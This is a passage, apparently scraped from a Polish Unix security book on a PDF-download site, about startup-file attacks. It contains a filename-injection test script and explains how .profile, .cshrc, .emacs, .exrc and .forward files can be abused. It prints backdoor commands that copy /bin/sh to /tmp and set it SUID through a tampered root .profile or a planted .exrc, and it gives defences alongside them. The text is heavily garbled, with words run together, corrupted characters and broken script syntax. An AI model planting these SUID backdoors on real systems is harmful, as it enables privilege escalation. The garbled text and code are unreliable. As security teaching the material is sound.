Wątki

[ Pobierz całość w formacie PDF ]
./wpadkathenecho "Ooops! Już tu jest find o nazwie wpadka."echo "Usuń go i spróbuj ponownie." ex i t lficat > wpadka � E-O-Fecho "Wpadka! Jeśli ten skrypt nie byłby taki miły, miałbyś problem! 1>&2" touch g$$ ex i t 2E-O-Fnazwa=foo; 'wpadka'touch "$nazwa"PATH=.:$PATHexport PATHfind /tmp -type f -exec echo (l \; > /dev/nullif test -f./g$$ thenecho "Ooops! find: wpadka"rm -f g$$ /else /echo "find: w porządku" fi ^X/^TT -l * l sed 's/A/wc /' l sh > /dev/nullif test -f./g$$thenecho "Ooops! powłoka: wpadka"rm -f g$$ " >else ^echo "powłoka: w porządku"fils -l | xargs ls >/dev/nullif test -f./g$$ ,thenecho "Ooops! xargs: wpadka"rm -f g$$ el seecho "xargs: w porządku" /fi /rm -f./wpadka "Snazwa" g$$Ataki za pomocą plików startowychRóżne programy mają różne metody automatycznej inicjacji, ustawiania opcji i zmiennych dlaużytkownika.Raz ustawionych opcji zazwyczaj się już nie zmienia.Dlatego są one polem dopopisu dla włamywaczy wprowadzających ukryte zmiany, które będą automatycznie w ich imieniuwykonane.Problem nie polega na tym, że istnieją pliki inicjacyjne, ale na tym, że ktoś może do nichzapisywać dane.Wszystkie pliki startowe powinny być zabezpieczone, tak aby tylko właścicielmógł do nich pisać.Nawet zezwalanie grupie na sięganie do nich może być niebezpieczne.Pliki.login,.profile, /etc/profileTe pliki są interpretowane podczas logowania użytkownika.Polecenia zawarte w nich sąwykonywane przez powłokę użytkownika.Zezwolenie napastnikowi na zapisywanie do tych plikówmoże skutkować wykonywaniem zadanych przez niego plików podczas każdego logowania lubjednorazowo (i z ukrycia):: plik.profile użytkownika root w wersji zmienionej przez włamywacza/bin/cp /bin/sh /tmp/.tajne/etc/chown root /tmp/.tajne/bin/chmod 4555 /tmp/.tajne: uruchomienie prawdziwego pliku.profile i usuniecie tego plikumv /.prawdziwy_profil e /.profile./.profile Pliki.cshrc i.kshrcSą to pliki, które można uruchamiać podczas logowania lub ponownego uruchamiania powłoki.Mogą być również uruchamiane po przełączeniu się na jakieś konto za pomocą polecenia su.GNU.emacsTen plik jest odczytywany i wykonywany podczas uruchamiania edytora GNU Emacs.W plikachstartowych użytkownika programu Emacs można zaszyć instrukcje w LISP-ie, za pomocą którychmożliwe będzie uruchamianie założonych z góry poleceń.Poza tym, jeśli jakikolwiek z katalogówwymienionych w ścieżce ładowania jest zapisy walny, możliwa jest również zmiana modułówbibliotecznych z podobnym skutkiem.Plik.exrcTen plik jest odczytywany podczas inicjacji edytora vi lub ex.Szczególnie nieprzyjemne jest to, żejeśli jakaś wersja tego pliku znajduje się w katalogu bieżącym, jego zawartość może byćwczytana i wykorzystana zamiast pliku z katalogu domowego użytkownika.Daje to włamywaczowi możliwość wykonania następujących poleceń w każdym katalogu, doktórego włamywacz ma dostęp:% cat >.exrc!(cp /b1n/sh /tmp/.tajne;chmod 4755 /tmp/.tajne)&*0Jeśli superużytkownik, który kiedykolwiek uruchomi edytor vi lub ex, będąc w jednym z tychkatalogów, utworzy interpreter sh typu SUID.Podczas uruchamiania edytora przez krótką chwilępojawi się znak ! Włamywacz będzie mógł pózniej powrócić do tego pliku SUID i za jego pomocąw pełni skorzystać ze wszystkich zasobów systemu.Niektóre wersje programów, takich jak vi czy ex, pozwalają wydać polecenie set noexrcw zmiennej środowiskowej EXINIT.Uniemożliwia to odczytywanie i wykonywanielokalnych plików.exrc.Pliki.forward i.procmailrcNiektóre programy zarządzające pocztą (ang.mailer) pozwalają użytkownikowi umieszczaćspecjalne pliki w katalogu domowym.W programie sendmail użytkownik może podawać wybraneadresy i programy w pliku.forward.Jeśli włamywacz może zapisywać do takiego pliku, możerównież zdefiniować działanie polegające na tym, że po otrzymaniu listu uruchamiany będziewskazany program - na przykład skrypt, który w katalogu /tmp utworzy powłokę SUID.Wiele popularnych programów zarządzających pocztą pozwala użytkownikom używać programówfiltrujących, które przetwarzają listy pocztowe w sposób półautomatyczny.Dotyczy to takichsystemów jak procmail, MH, elm i wielu innych.Niektóre z nich mają całkiem spore możliwości,ale stanowią również potencjalne zagrożenie dla bezpieczeństwa systemu [ Pobierz całość w formacie PDF ]

  • zanotowane.pl
  • doc.pisz.pl
  • pdf.pisz.pl
  • mikr.xlx.pl
  • Powered by MyScript